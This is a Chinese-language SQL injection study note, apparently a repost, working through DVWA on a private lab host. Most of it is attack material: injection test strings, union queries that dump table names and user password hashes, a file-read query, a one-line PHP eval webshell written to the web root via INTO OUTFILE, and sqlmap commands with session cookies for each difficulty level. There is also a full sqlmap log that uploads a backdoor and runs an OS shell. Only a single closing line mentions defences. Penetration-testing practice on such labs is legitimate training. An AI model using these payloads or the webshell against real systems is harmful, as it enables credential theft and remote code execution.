sql回顯注入-筆記

時間 2019-11-11

標籤 sql 注入筆記欄目 SQL 简体版

原文原文鏈接

拼接sql命令查詢數據

註釋經常使用於sql注入

# 井號單行註釋注意：URL編碼 %23

-- 兩個減號加空格單行註釋

/* */ 註釋一個區域

注意！在sql注入遇到單引號被轉譯的狀況可使用 HEX編碼繞過單引號的使用

注入測試poc

1 or 1=1

1' or '1=1

1" or "1=1

sql注入用法

查看錶單字段數（列數）

使用二分法 order by 列數排序

肯定回顯點 XXX' union select 1,2;

http://192.168.3.88/dvwa/vulnerabilities/sqli/

?id=xx'+union+select+1,2--+

&Submit=Submit#

查看數據庫版本存放目錄

http://192.168.3.88/dvwa/vulnerabilities/sqli/

?id=xx'+union+select+@@version,@@datadir-- +

&Submit=Submit#

查詢數據庫用戶名和數據庫名

select user(),database();

python sqlmap.py -u " http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" --current-user --current-db

查看錶名 select table_name from information_schema.tables where table_schema='dvwa';

http://192.168.3.88/dvwa/vulnerabilities/sqli/

?id=xx'+union+select+1,table_name+from+information_schema.tables+where+table_schema='dvwa'-- +

&Submit=Submit#

python sqlmap.py -u " http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa --tables

查看列名 select column_name from information_schema.columns where table_name='users';

http://192.168.3.88/dvwa/vulnerabilities/sqli/

?id=xx'+union+select+1,column_name from information_schema.columns where table_name='users'-- +

&Submit=Submit#

python sqlmap.py -u " http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa -T users --columns

查詢用戶名密碼 select user,password from users;

http://192.168.3.88/dvwa/vulnerabilities/sqli/

?id=xx'+union+select user,password from users-- +

&Submit=Submit#

python sqlmap.py -u " http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa -T users -C "user,password" --dump

文件讀取 select load_file('c:\\windows\\win.ini');

寫入一句話webshell

select "<?php @eval($_GET['cmd']);?>" into outfile 'c:\\phpStudy\\WWW\\dvwa\\ttt.php';

___

__H__

___ ___[']_____ ___ ___ {1.1.4.16#dev}

|_ -| . ['] | .'| . |

|___|_ [(]_|_|_|__,| _|

|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:42:39

[09:42:39] [INFO] resuming back-end DBMS 'mysql'

[09:42:39] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)

Payload: id=1' OR NOT 1977=1977#&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: id=1' AND (SELECT 3539 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3539=3539,1))),0x7178767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FXCd&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: id=1' AND SLEEP(5)-- peqj&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 2 columns

Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x716a767171,0x50557565536267736d786d6466746d634a4d6b46466d61764e46484d635941774f6a725371596862,0x7178767171)#&Submit=Submit

---

[09:42:39] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.4.45, Apache 2.4.23

back-end DBMS: MySQL >= 5.0

[09:42:39] [INFO] going to use a web backdoor for command prompt

[09:42:39] [INFO] fingerprinting the back-end DBMS operating system

[09:42:39] [INFO] the back-end DBMS operating system is Windows

which web application language does the web server support?

[1] ASP (default)

[2] ASPX

[3] JSP

[4] PHP

> 4

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n

[09:42:43] [WARNING] unable to automatically retrieve the web server document root

what do you want to use for writable directory?

[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 2

please provide a comma separate list of absolute directory paths: C:\phpStudy\WWW\DVWA

[09:42:51] [WARNING] unable to automatically parse any web server path

[09:42:51] [INFO] trying to upload the file stager on 'C:/phpStudy/WWW/DVWA/' via LIMIT 'LINES TERMINATED BY' method

[09:42:51] [INFO] heuristics detected web page charset 'ascii'

[09:42:51] [INFO] the file stager has been successfully uploaded on 'C:/phpStudy/WWW/DVWA/' - http://192.168.3.88:80/DVWA/tmpummkl.php

[09:42:52] [INFO] the backdoor has been successfully uploaded on 'C:/phpStudy/WWW/DVWA/' - http://192.168.3.88:80/DVWA/tmpbhbmv.php

[09:42:52] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell> dir

do you want to retrieve the command standard output? [Y/n/a] y

[09:42:56] [INFO] heuristics detected web page charset 'GB2312'

command standard output:

---

驅動器 C 中的卷是 BOOTCAMP

卷的序列號是 D89B-813F

C:\phpStudy\WWW\DVWA 的目錄

2017-05-16 09:42 <DIR> .

2017-05-16 09:42 <DIR> ..

2015-10-05 15:51 500 .htaccess

2015-10-05 15:51 3,845 about.php

2015-10-05 15:51 7,229 CHANGELOG.md

2017-04-25 09:18 <DIR> config

2015-10-05 15:51 33,107 COPYING.txt

2017-04-25 09:18 <DIR> docs

2017-04-25 09:18 <DIR> dvwa

2017-04-25 09:18 <DIR> external

2015-10-05 15:51 1,406 favicon.ico

2017-04-25 09:18 <DIR> hackable

2015-10-05 15:51 895 ids_log.php

2015-10-05 15:51 4,389 index.php

2015-10-05 15:51 1,869 instructions.php

2015-10-05 15:51 3,522 login.php

2015-10-05 15:51 414 logout.php

2015-10-05 15:51 148 php.ini

2015-10-05 15:51 199 phpinfo.php

2015-10-05 15:51 7,651 README.md

2015-10-05 15:51 26 robots.txt

2015-10-05 15:51 4,686 security.php

2015-10-05 15:51 2,364 setup.php

2017-05-04 20:59 466 test.php

2017-05-16 09:42 908 tmpbhbmv.php

2017-05-16 09:42 727 tmpummkl.php

2017-05-15 21:11 29 ttt.php

2017-04-25 09:18 <DIR> vulnerabilities

20 個文件 74,380 字節

8 個目錄 18,391,883,776 可用字節

---

os-shell> x

[09:43:02] [INFO] cleaning up the web files uploaded

[09:43:02] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 2 times

[09:43:02] [INFO] fetched data logged to text files under 'C:\Users\zptxwd\.sqlmap\output\192.168.3.88'

[*] shutting down at 09:43:03

sqlmap工具自動注入

low

python sqlmap.py -u " http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=1r06imrpmtlhgg7magi3oos273;security=low"

medium.

注意！在sql注入遇到單引號被轉譯的狀況可使用 HEX編碼繞過單引號的使用

DVWA

正常業務邏輯：根據User ID在數據庫內查找信息並回顯至web頁面

select firstname,surname from XXX where user_id='

LOW

使用1' or '1=1測試發現可行

python sqlmap.py -u " http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=1r06imrpmtlhgg7magi3oos273;security=low"

medium.

改包修改post參數

1 or 1=1

python sqlmap.py -u " http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=medium"

python sqlmap.py -u " http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=medium" -D dvwa -T users -C "user,password" --dump

high

能夠發現查詢位置與回顯位置不一致

python sqlmap.py -u " http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=dv9h9urfu9bf9udkd7ih6qdbj3;security=high" --second-order " http://192.168.3.88/dvwa/vulnerabilities/sqli/session-input.php#"

防止sql注入：檢測id數據類型，預編譯綁定ID變量

使用預編譯、存儲過程

相關標籤/搜索

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。